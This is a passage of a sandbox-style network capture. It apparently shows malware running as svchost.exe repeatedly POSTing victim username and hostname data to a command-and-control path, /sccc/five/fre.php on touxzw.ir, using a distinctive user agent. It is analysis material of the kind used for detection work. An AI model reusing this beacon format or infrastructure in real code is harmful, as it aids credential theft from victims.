Feb 20, 2025 15:07:28.038355112 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ryEi2yczjMc1CXC1nlXpMZiPtiAmLOvsS8KQgCTFhwSVevJu7DebWj1Ekr9wHkE%2B46WLc88kFKE7gLCjuXmR1wPAVTnbxOs1rl6lPHt2I0JRfdGf4MU2PWMx0vg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10267e9d5e65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1839&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50014	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:29.201344967 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:29.206393003 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:29.915473938 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=luhCtyiybYpQARM8VGLJikOncmIWcWUs9h2f99%2BeLUSPRWkMMwTrCsUSyMxmC3W6S7ZmTU54s4zLtvk4YbhyW%2Fe0OnctETctP%2F9jDsB2QAeBk81eIgXNDt6uJVM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10323a1142f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1834&rtt_var=917&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50015	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:31.089487076 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:31.094569921 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:31.846661091 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:07:31 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeSSsPM7fg5e1DR27Bmn%2FxqJ7Hxl8n9FyCg6rB%2BLiacqcRIvIcd1%2BSGaRiQBYsW7wUP2IOADUgNnbGOHIFyqFIWE5%2BbaSKu3PleswjewrNF%2FyXRVIsmY6If9G7U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f103def1b8c8d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50017	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:33.017165899 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:33.022212982 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:33.870053053 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RR5GcOYM84hP52XKlEvdqa9sYIXnaRQy9Do4xW6ORavjb8a%2BbupWvebzTqIT29AGQnJJQDYdaSvmoWxKfei4vIvGz9ttR00D7YVNPuMBlHzr60DmCJ%2F0GNVTBCs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1049ed781a0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2261&min_rtt=2261&rtt_var=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50018	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:35.028707027 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:35.033842087 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:35.752533913 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:07:35 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPTPr5H8VFoRJD7kfBou9qmMyuz2RFV5wUbgRtw1H9Jts0kQkS8Hn%2Bylt1URD0U32RMkuWduYibnGncrvCRxiyhb66qMEzR5u0AJMGC6J3kX%2BdaWbIre3degEhM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1056784e5e7c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50019	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:36.938810110 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:36.945111990 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:37.734409094 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XNgis6F7CG5UVV%2BtoK%2BZJRJfp%2BiJi0nRf9piyiB0QO76DoKgDQOOkcoS7cKcIwx8mhc8Mje7OYNftD3gWczF9NfiMq73tGvvi8DFm0AbSPmlIf9WsIhez%2FE0ImY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10626dec4264-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=783&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50020	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:38.922544956 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:38.927592039 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:39.714694977 CET	843	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H86zjjDzugk2SKSgK0%2B2b33ruaKWJbJ5wBD72dX8KL879DRHp%2BbU2EYrpu%2FncJ8IFqKlK8sdTI8lWKPm6hEBrDIj62zKuc7KR7nbL7VD2F2EBVAfvkhZxXq5Xhs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f106ecb77efa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2007&rtt_var=1003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50021	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:40.872845888 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:40.878180981 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:41.671948910 CET	840	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0w%2B2Ve3wJfkoIg6x7YUT1mQKg9pipP6MuzHcOwSsqqIFiCxMsSwtxrQD8G2gOAKRx0ekqebu3auoXgA1KE%2Fw3ApGORVKNIBdtfVLMCGiDG6ekx3nrM9V9ZPbkUM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f107afc3b7285-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1969&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50022	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:42.840439081 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:42.845534086 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:43.653316021 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Mwm8TyHjX6dT0ZTErzEhothkzyUVXdWZMfCo3x2HiVA4xNhdBh0hBMyL13r8ol7B5JZLuGU%2BAVLE2LyDTOyrWt9uxj3z7HGGTJyKrWcNl5hjp88Q4nfFYm%2Bn4M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10874c3342c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50023	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:44.819883108 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:44.825217009 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:45.616121054 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cL2Z9xhX1ZqgUH3XA7OyK4xeXwgCbI83sYAMO7woifrd70VxzwbwMUODb09ruF1kdcXQMEXfNTFH26uPGDVN4iPIEh%2BedAegMkQDnLaEhKmUwCL%2BbKU3djS43vI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1093a9c47c9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=2006&rtt_var=1003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50025	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:47.033047915 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:47.038070917 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:47.845094919 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkPerHTIPef%2FmUsrqSN4aqH2GRW0k%2BMdOeUIQfV6rMY9Ke20%2BZe1sZyAJBeeecNbNxesQuH5une33glCcQo739vNz9w7Nu4PyvxShYRz53s5z8lAHc%2FwD7Rp%2FdY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10a19b9d43ef-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	50026	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:48.999012947 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:49.004231930 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:49.785264015 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLbN0fYlqK4Y8jCt2xuuF%2B1KJzd3LiQB0vGRW1HjRWQd9pmtknRqCXpk%2BxjUatqGX5taen0TzAcIJq9AVLa7mJcGyBJpvOgCOxRhPK22jjH8YYOwtnmN%2B4h0rVQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10adccfec354-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1515&min_rtt=1515&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	50027	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:50.937803030 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:50.942877054 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:51.729665995 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvX9wzInL9qkGYjd5vJzsQHy76J%2F2CIFX3UR0GdlL8dEN3BB3RJMOAnoQf3uKnhvF1phnmxFmh%2Fp0%2BWkRSSUdZOM7TC0VzsL9J%2FnXU5WF7XysQAE%2FBmKiEFrXvU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10b9eba3c472-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50028	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:52.906805992 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:52.911839962 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:53.712904930 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qjk23z3D3Gnv%2BhycVzvJgORXqfTAoRC3Vogy3NRUBOOIfsJFTCRgffCOb4cXWYjbXkQQoO9NVKA1kPobVPl1vHpk0AWggSZKlr5JUUgx9WMstN2UcmhKEoLp93c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f10c62dca0f4a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1446&rtt_var=723&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

